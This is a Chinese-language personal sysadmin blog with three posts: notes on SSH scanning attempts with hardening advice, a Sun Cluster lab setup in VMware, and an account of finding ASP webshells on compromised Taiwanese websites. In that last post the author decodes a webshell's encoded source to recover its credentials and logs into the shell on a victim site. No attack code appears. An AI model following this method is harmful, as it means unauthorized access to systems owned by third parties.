Connected to 59.125.163.62.
Escape character is '^]'.
220 VMware Authentication Daemon Version 1.10: SSL Required, MKSDisplayProtocol:VNC

TELNET他的TCP/80看到

Apache/2.2.3 (Fedora) Server at www.m■■■■e.net Port 80
站點馬賽克處裡..

嘿..原來是架在Fedora上面的機器,還有提供服務啊,GOOGLE了一下看起來像是提供WAP/PDA的一些資訊服務吧.

原則上比較傾向認定那台機器也是受害者吧..

後記:剛KEY完這篇不到半小時,結果又有另兩台機器來TRY了,分別是 83.145.82.134 & 90.183.8.146,行為模式也與上面寫的相同,
看來這種亂槍打鳥掃SSH PORT的機器不少,頻率也頗高....剛開半天就來3次

結論: 機器架起來該做的防護還是要做,不該對外開的服務就盡量關掉或擋掉,ssh port能改就改..三不五時還得要關心一下機器有沒異狀..

2008-03-05

Sun Cluster & Scalable Service test in VMWARE test environment..

熊熊發現一個多月沒UPDATE了..
其實這段期間也是有寫些東西,不過寫完後都壓住不發,過了幾天再看就覺得寫的不好就此作罷..
畢竟文字表述並非所長,沒必要瞎寫來硬湊篇幅..
不過荒廢一個多月下來,香菇都長滿了,就挖點過去的東西來灌溉一下好了..

2006年初因為工作需要測試 Sun Cluster,
(那時候是幫老闆搶標一個中華電WIFI PHONE/MOD PHONE計畫使用的DHCP/RADIUS Service所準備的,不過最後該案子也是無疾而終.)

當時開發測試調校階段沒那麼多本錢弄SPARC的機器來測試 .
只有在最後上機評審前兩天才真有SPARC機器可以調校.
若要用一堆x86的機器來搞也嫌麻煩..
所以就嘗試用 VMWARE來建置一組 Sun Cluster的環境來測試
把整個建置的過程簡單記錄如下.當作一個筆記吧.
主要是quorum device& global device的部份..花了不少try & error 的時間

1.首先先到 http://www.sun.com/ 下載 Solaris 9 x86 & Sun Cluster 3.1 x86 0904

2.在VMWARE中創建一個新的Virtual Machine.
Guset OS就選 Solaris 9
VMWARE會用IDE DISK來裝Solaris 9 ,
SCSI的部份得選LSI SCSI 才能被Soaris內建的Driver認出,
不過現在先不管SCSI的部份
等最後要作 Quorum device的時候在來處裡
給VM 三張網卡. 一張作為公用網路介面..另外兩張是叢及互連用

3.開始安裝Solaris 9 x86 ,
這台機器就當Node1 , 安裝時在做硬碟分區時多弄一個分區
作 /globaldevices (Node1我是設為 c0d0s3)
這個分區之後sun cluster會用到

4.當Node1裝完以後,
利用VMWARE的clone功能複製一份做為Node2.(省掉安裝的時間)

5.把Node2的hostname & ip改過
以避免跟Node1衝突
/etc/nodename /etc/hosts /etc/hostsname.pcn0

6.Node2的/globaldevices分區調整一下,不要跟Node1相同.
否則在裝完cluster以後兩台的globaldevice會相衝
(我是把 /globaldevices 調整到 c0d0s4)
這點很奇怪,docs.sun.com裡面沒提,試了好多次才找到解法
可能他們沒想到有人會白目到用IDE硬碟來裝cluster吧. 哈..=_=””

7.兩台都把彼此的 IP/HOSTNAME 加進 /etc/hosts中

8.新增Quorum device:
關掉兩個NODE的VM.. 先再其中一個VM裡面創建一顆SCSI DISK..
創完以後到另一個NODE去新增DISK,選擇已存在的virtual disk,
把他指到剛剛建的那個DISK檔案上
再來就是編輯這兩個VM的 .vmx 檔案.. 加上
scsi0:0.mode = "independent-persistent"
scsi0:0.deviceType = "disk"
disk.locking=FALSE <=取消DISK LOCK 才能讓兩台把這個DEVICE當作Quorum device 2 Nodes cluster 必須要有quorum device才能正常運作.. 3 Nodes以上的非必需..但是沒有的話在錯誤轉移過程上還是會有點問題

9.Node1& Node2開機以後用 drvconfig , devlinks, disks, 來新增這顆SCSI硬碟.. 接下來 format, newfs 只要再其中一台做就好了

10.開始安裝Sun Cluster 3.1 x86 0904.. 安裝過程在 docs.sun.com 裡面有詳細的說明..在此不作贅述
看是直接用scsinstall or install 來裝都行..
差別只在一個是設定安裝同時進行..另一個是先安裝..之後再設定
設定過程照sun的文件來做就好

11.在任一個cluster安裝完成Node上執行 /usr/cluster/bin/scsetup
首先會要指定quorum device..
可以用 /usr/cluster/bin/scdidadm –L
來看剛剛新建的那個SCSI DISK 被放到哪一個did上
像是我這邊是被認為/dev/did/rdsk/d3
所以scsetup 中就把 quorum device設為 d3

12.接下來就可以用scsetup來進一步設定cluster了..然後開始測試吧… ^^

接下來是用SSHD當作標的來簡單測試Scalable Service

This is a test for SunCluster Scalable Service use SSHD
stop sshd first stop rc script

SHARE ADDRESS USE VMS9 (192.168.1.110)
NODE1 VMS9A (192.168.1.111)
NODE2 VMS9B (192.168.1.112)

scrgadm -a -t SUNW.gdsscrgadm -a -g sa_rgscrgadm -a -S -g sa_rg \
-l VMS9scrgadm -a -g SSH -y Maximum_primaries=2 \
-y Desired_primaries=2 -y RG_dependencies=sa_rgscrgadm -a -j SSHD \
-g SSH -t SUNW.gds -y Scalable=TRUE -y Start_timeout=120 \
-y Stop_timeout=120 -y Port_list="22/tcp" \
-x Start_command="/etc/init.d/sshd start" \
-x Stop_command="/etc/init.d/sshd stop" \
-y Network_resources_used=VMS9 \
-x Failover_enabled=TRUE -x Stop_signal=9scswitch \
-Z -g sa_rgscswitch -Z -g SSH

test
and VMS9(192.168.1.110) is bind on VMS9A(192.168.1.111)
ssh to VMS9 => go to VMS9A & VMS9B....

2008-01-10

續:從GOOGLE挖出一堆被破台的台灣網站



今天閑著沒事繼續用關鍵字找那個asp webshell,結果有了個意外的發現




居然有一個站點直接show asp原始碼出來..


先看一下他的架構..是apache的server..

居然把asp丟到apache上,難怪原始碼整個show出來.

再來就研究這隻asp的原始碼了.

雖然有用VBScript.Encode加密,不過這可難不倒google大神

先找出登入相關的部份的原碼

請google大神找出VBScript.Encode解碼器.


把那段加密代碼貼進去



解出來就發現裡面有帳號密碼資訊..

(帳號密碼我這把它蓋掉了,以免有無聊人士亂try.不過有點概念的人照這個思路去找自己也找的出來)

接下來就用找出來的帳號密碼來找個被他破台站點登入試試看

....這樣就給他進去了.....

一開始看到的就是檔案管理介面.不過權限被限制住了.

這帳號進去只能看幹不了什麼

我也懶得再花時間去玩它了..



再來就是瞧瞧這些被破台的機器是誰的..

把他們host name放進whois去查查



第一位苦主 knrglass.com IP是61.66.28.117(SPARQ的IP)

反查IP出來的DNS反解是w17.12.com.tw

w17.12.com.tw是戰X策的虛擬主機在用的

另一位苦主 chungshih.com

IP反解出來也是戰X策公司的虛擬主機.





看來這間戰X策的虛擬主機淪陷了不只一台..


這幾支ASPSHELL程式GOOGLE都幫他們找出來了.

戰X策還沒警覺..對照網友roamer寫的這篇
資訊鐵胃...再多木馬都塞的下? - roamer - Yahoo!奇摩部落格

只能說這是最大的諷刺....